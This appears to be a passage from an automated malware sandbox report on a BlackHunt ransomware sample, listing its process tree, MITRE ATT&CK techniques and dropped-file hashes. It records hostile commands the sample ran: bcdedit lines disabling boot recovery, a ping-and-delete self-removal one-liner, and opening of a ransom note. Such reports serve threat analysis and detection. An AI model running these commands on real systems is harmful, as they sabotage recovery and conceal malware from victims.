C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 14204⤵
- Program crash
PID:6924
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe"2⤵PID:9164
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:7300
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:6448
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:9840
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6780
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6864
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7960
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6260
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:12104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6444 -ip 64441⤵PID:6276
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54dbf79edeb9de9af9f0659e34d6e2cc4
SHA133469b3d8139260d3eda662c6f5ad1b9adbb54f5
SHA25660e56e5b65f32e256b42a92bae2a5e5c1978e9a87cd5ac960d631f5af57a0b6c
SHA51282a79d077ead4e6be4366b77b3c39fd105e0c5322ee51a896065f184cc8f42f144abf790a76dc67adc6ff4d5505ea249fea90156b4f0032fc5e159f5bd5089aa
-
Filesize
12KB
MD56048f88c63ad3f47c1276f884d7922bd
SHA1bf99d35256adce599c2ba77842c4582d12341572
SHA2564cfe5e1a390a8a873009c78957f2161ed6f2079622ea0c3a1c6453e428f571fb
SHA5121273a088b066db46f0005f4505e9bfac859dcc0c6645a6c648ca14811de1be9c893ac68542cf30e02b8e4503ec2a645e23326a967c587edb1f375ecfcada8656
-
Filesize
684B
MD5a56452665c49c2d11ed7862573baeab1
SHA16a69cb0afaf227f03bf7f6d2cbd35ba872062ff5
SHA256c13299d4decc3fe6f60625030046796718b489d37f0e2f302e21e65149ea4c36
SHA512aa1936092e94992640bbadd88ea93d8624bf59948d43f3aa385339e7c8004a97aa839a8c68850ad2eccf6ea390ca3ec7befc6553c3f1ed44523683d48847b6af